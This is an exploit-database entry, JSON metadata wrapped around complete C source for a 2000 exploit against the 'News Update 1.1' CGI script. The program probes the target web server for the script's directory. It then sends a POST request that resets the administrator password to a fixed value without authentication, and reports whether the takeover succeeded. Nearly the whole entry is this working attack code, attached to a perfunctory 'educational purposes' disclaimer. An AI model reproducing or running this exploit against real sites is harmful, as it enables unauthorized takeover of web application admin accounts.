News Update 1.1 - Change Admin Password

2000-11-15T00:00:00

Description

{"lastseen": "2020-04-01T19:04:37", "references": [], "description": "\nNews Update 1.1 - Change Admin Password", "edition": 1, "reporter": "morpheus[bd]", "exploitpack": {"type": "webapps", "platform": "cgi"}, "published": "2000-11-15T00:00:00", "title": "News Update 1.1 - Change Admin Password", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.0, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2000-11-15T00:00:00", "id": "EXPLOITPACK:6959190907747447427C4A46016C7F0A", "href": "", "viewCount": 3, "sourceData": "/***************************************************************************\n news_exp.c - description\n -------------------\n begin : Sat Oct 21 2000\n copyright : (C) 2000 by Morpheus[bd]\n email : morpheusbd@gmx.net\n advisory\t\t : www.brightdarkness.de\n\n Exploit code for the News Update 1.1 by Morpheus[bd]\n For more information see my advisory which should be in this .tar.gz\n package.\n\n Compiling/Linking: gcc exploit.c -o exploit\n Usage: will be printed when the exploit is started without arguments\n\n ***************************************************************************/\n\n/***************************************************************************\n [Disclaimer]\n Standard disclaimer applies here. Do not use this program. This program\n is only for educational purposes. Use it on your on risk.\n\n ***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. *\n * *\n ***************************************************************************/\n\n#include <stdio.h>\n#include <string.h>\n#include <ctype.h>\n#include <stdlib.h>\n#include <netdb.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n#include <errno.h>\n#include <fcntl.h>\n#include <signal.h>\n#include <arpa/nameser.h>\n#include <sys/stat.h>\n\n#define\t\t\tWEISS\t\t printf(\"\\033[0;29m\")\n#define ROT printf(\"\\033[1;31m\")\n#define \tGRUEN printf(\"\\033[1;32m\")\n#define\t\t GELB printf(\"\\033[1;33m\")\n#define\t\t\tBLAU\t\t printf(\"\\033[1;34m\")\n#define\t\t\tLILA\t\t printf(\"\\033[1;35m\")\n#define \tHELLROT printf(\"\\033[1;36m\")\n\n#define MAXBUFFER 4096\n\n/******************* AUSGABEN ************************/\n\n/* At the moment everything will be written to the STDOUT */\n\n#define EXPLOIT_INFO\t\t2 /* If you only want Exploit infos ... change it to 1 and DEBUG to 1 */\n#define\tDEBUG_INFO\t\t2 /* If you only want Debug infos ... change DEBUG to 2 */\n\n#define\tDEBUG\t\t\t2\n\n/*****************************************************/\n\n/* Standard-Pfad des News Update scripts */\n#define\tNEWSUPDATE_PATH\t\"/cgi-bin/dummy/newsup\"\n\n/* Name des News Update scripts */\n#define\tNEWS_UPDATE\t\"newsup.pl\"\n\n/* Das gew?schte Passwort f? die News Update Form */\n#define\tPWD\t\t\"morpheus\"\n\n/* HTTP-Request f? die News Update Form */\n#define\tNEWS_UPDATE_PWD\t\"POST %s HTTP/1.0\\r\\n\" \\\n\t\t\t\"Host: %s\\r\\n\" \\\n\t\t\t\"Referrer: %s\\r\\n\" \\\n\t\t\t\"Connection: Close\\r\\n\" \\\n\t\t\t\"User-Agent: %s\\r\\n\" \\\n\t\t\t\"Accept: */*\\r\\n\" \\\n\t\t\t\"Content-type: application/x-www-urlencoded\\r\\n\" \\\n\t\t\t\"Content-length: %d\\r\\n\" \\\n\t\t\t\"\\r\\n\" \\\n\t\t\t\"pwd=%s&pwd2=%s&setpwd=++Set+Password++\\r\\n\" \\\n\t\t\t\"\\r\\n\"\n\n/* Ein einfacher HTTP-Request um eine Datei von einem Web-Server zu saugen */\n#define SIMPLE_REQUEST\t\"GET %s HTTP/1.0\\r\\n\" \\\n\t\t\t\"Host: %s\\r\\n\" \\\n\t\t\t\"\\r\\n\"\n\n#define BROWSER \"Morphi-Browser (X11; U; Linux 2.4 i686)\"\n\nssize_t writen(int fd, const void *vptr, size_t n)\n/* Taken from UNIX Network Programming - Vol. I by W.R. Stevens */\n {\n size_t nleft;\n ssize_t nwritten;\n const char *ptr;\n\n ptr = vptr;\n nleft = n;\n while(nleft > 0) {\n if ( (nwritten = write(fd, ptr, nleft)) <= 0) {\n if (errno == EINTR)\n nwritten = 0;\n else\n return (-1);\n }\n nleft -= nwritten;\n ptr += nwritten;\n }\n return (n);\n }\n\nstatic ssize_t my_read(int fd, char *ptr)\n/* Taken from UNIX Network Programming - Vol. I by W.R. Stevens */\n{\n\tstatic int\tread_cnt = 0;\n\tstatic char\t*read_ptr;\n\tstatic char\tread_buf[4096];\n\n\tif (read_cnt <= 0) {\nagain:\n\t\tif ( (read_cnt = read(fd, read_buf, sizeof(read_buf))) < 0) {\n\t\t if (errno == EINTR)\n\t\t goto again;\n\t\t\treturn(-1);\n\t\t} else if (read_cnt == 0)\n\t\t\treturn(0);\n\t\tread_ptr = read_buf;\n\t}\n\n\tread_cnt--;\n\t*ptr = *read_ptr++;\n\treturn(1);\n}\n\nssize_t readline(int fd, void *vptr, size_t maxlen)\n/* Taken from UNIX Network Programming - Vol. I by W.R. Stevens */\n{\n\tint\t\tn, rc;\n\tchar\tc, *ptr;\n\n\tptr = vptr;\n\tfor (n = 1; n < maxlen; n++) {\n\t\tif ( (rc = my_read(fd, &c)) == 1) {\n\t\t\t*ptr++ = c;\n\t\t\tif (c == '\\n')\n\t\t\t\tbreak;\t/* newline is stored, like fgets() */\n\t\t} else if (rc == 0) {\n\t\t\tif (n == 1)\n\t\t\t\treturn(0);\t/* EOF, no data read */\n\t\t\telse\n\t\t\t\tbreak;\t\t/* EOF, some data was read */\n\t\t} else\n\t\t\treturn(-1);\t\t/* error, errno set by read() */\n\t}\n\n\t*ptr = 0;\t/* null terminate like fgets() */\n\treturn(n);\n}\n\n/* Stellt die Verbindung zum HTTP-Port des Servers her */\nint http_connection(char host[100])\n {\n struct sockaddr_in sa;\n struct hostent *hp;\n\n int sockfd;\n int port = 80;\n\n sockfd = socket(AF_INET, SOCK_STREAM, 0);\n bzero(&sa, sizeof(sa));\n sa.sin_family = AF_INET;\n sa.sin_port = htons(port);\n if ( (sa.sin_addr.s_addr = inet_addr(host)) == -1)\n {\n if ( (hp = (struct hostent *) gethostbyname(host)) == NULL)\n {\n ROT;\n perror(\"gethostbyname:\");\n WEISS;\n return (-1);\n }\n memcpy(&sa.sin_addr.s_addr,hp->h_addr,sizeof(hp->h_addr));\n }\n\n if (connect(sockfd, (struct sockaddr *) &sa, sizeof(sa)) < 0)\n {\n ROT;\n perror(\"Connect:\");\n close(sockfd);\n WEISS;\n return (-1);\n }\n return sockfd;\n }\n\n\n/* Exploited das News Update script und schleu? ein neues Password ein */\nint news_update_exploit(char *host, char *path)\n {\n int i = 0, sockfd = 0;\n char cmd[MAXBUFFER];\n\n if ((sockfd = http_connection(host)) == -1) { ROT; printf(\"Damn ... no connection to %s\\n\", host); WEISS; return; }\n\n i = snprintf(cmd, sizeof(cmd), NEWS_UPDATE_PWD, path, host, \"www.brightdarkness.de\", BROWSER, 34 + strlen(PWD), PWD, PWD);\n GELB;\n if (DEBUG == DEBUG_INFO) { GELB; printf(\"Sending following request to %s[%d]:\\n%s\", host, 80, cmd); WEISS; }\n WEISS;\n if (writen(sockfd, cmd, i) == -1)\n {\n ROT;\n printf(\"Man, man, man ....... Ihr verdammten Idioten .... kann man hier nicht mal in Ruhe writen() ?\\n\");\n WEISS;\n exit(-1);\n }\n\n GELB;\n if (DEBUG == DEBUG_INFO) printf(\"Output from Server:\\n\");\n WEISS;\n while (readline(sockfd, cmd, MAXBUFFER) != 0)\n {\n \tBLAU;\n \tif (DEBUG == DEBUG_INFO) printf(\"%s\", cmd);\n \tWEISS;\n \tif (strstr(cmd, \"Password Success\") != NULL)\n \t {\n \t GRUEN;\n \t if (DEBUG == EXPLOIT_INFO) printf(\"Exploit: Success!!!!\\n\");\n \t if (DEBUG == EXPLOIT_INFO) printf(\"The new password: %s\\n\", PWD);\n \t WEISS;\n \t return (0);\n \t }\n }\n ROT;\n if (DEBUG == EXPLOIT_INFO) printf(\"Exploit: failed.\\n\");\n WEISS;\n return (-1);\n }\n\n/* How to use this fucking lame proggy *rofl* */\nvoid usage(char *arg)\n {\n ROT;\n printf(\"news_update_exploit - News Update Password Changer - v0.1\\n\");\n printf(\"------------=====||| by Morpheus[bd] |||=====------------\\n\");\n GELB;\n printf(\"\\nUsage:\");\n GRUEN;\n printf(\"%s host/ip [path]\\n\\n\", arg);\n printf(\"path: alternative path to the newsup.pl\\n\");\n WEISS;\n exit(-1);\n }\n\n/* Existiert das Verzeichnis der Form ?erhaupt ? */\nint check_directory(char *host, char *ptr)\n {\n int i = 0, sockfd = 0;\n char cmd[MAXBUFFER], *ptr2;\n\n ptr2 = ptr + strlen(ptr);\n if (*(ptr2 - 1) != '/')\n {\n *ptr2 = '/';\n *(ptr2 + 1) = '\\0';\n }\n\n GELB;\n if (DEBUG == DEBUG_INFO) printf(\"Checking if %s exists on the target server...\\n\", ptr);\n WEISS;\n\n if ((sockfd = http_connection(host)) == -1) { ROT; printf(\"Damn !!!... No connection to %s.\\n\", host); WEISS; return; }\n\n i = snprintf(cmd, sizeof(cmd), SIMPLE_REQUEST, ptr, host);\n GELB;\n if (DEBUG == DEBUG_INFO) printf(\"Sending following request to %s[%d]:\\n%s\", host, 80, cmd);\n WEISS;\n if (writen(sockfd, cmd, i) == -1)\n {\n ROT;\n printf(\"Man, man, man ....... Ihr verdammten Idioten .... kann man hier nicht mal in Ruhe writen() ?\\n\");\n WEISS;\n exit(-1);\n }\n\n if (readline(sockfd, cmd, MAXBUFFER) == 0)\n {\n ROT;\n printf(\"Error: Reading from HTTP Server.\\n\");\n WEISS;\n exit(-1);\n }\n if (strstr(cmd, \"404\") == NULL)\n {\n GRUEN;\n if (DEBUG == DEBUG_INFO) printf(\"The directory was found.\\n\");\n WEISS;\n while (readline(sockfd, cmd, MAXBUFFER) != 0);\n close(sockfd);\n return (0);\n }\n\n if (DEBUG == DEBUG_INFO) printf(\"The directory was NOT found.\\n\");\n while (readline(sockfd, cmd, MAXBUFFER) != 0);\n close(sockfd);\n return (-1);\n }\n\n/* Das tolle Hauptprogramm *fg* */\nint main(int argc, char **argv)\n {\n char buf[MAXBUFFER];\n\n if (argc < 2)\n {\n usage(argv[0]);\n }\n\n if (argc >= 3)\n {\n /* Ein alternatives Verzeichnis wurde als Parameter ?ergeben */\n strncpy(buf, argv[2], sizeof(buf));\n if (check_directory(argv[1], buf) == -1)\n {\n ROT;\n printf(\"Error: The given directory was not found.\\nPlease provide a different directory.\\n\");\n WEISS;\n exit(-1);\n }\n strcat(buf, NEWS_UPDATE);\n }\n else\n {\n /* Kein alternatives Verz. angegeben, benutze Standard-Verzeichnis */\n strncpy(buf, NEWSUPDATE_PATH, sizeof(buf));\n if (check_directory(argv[1], buf) == -1)\n {\n ROT;\n printf(\"Error: The given directory was not found.\\nPlease provide a different directory.\\n\");\n WEISS;\n exit(-1);\n }\n strcat(buf, NEWS_UPDATE);\n }\n\n /* Let's rock !!!! */\n news_update_exploit(argv[1], buf);\n return (0);\n }\n\n\n// milw0rm.com [2000-11-15]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645533525, "score": 1659818015}, "_internal": {"score_hash": "fc2a799abb09ebad9a31b6d7f0472a52"}}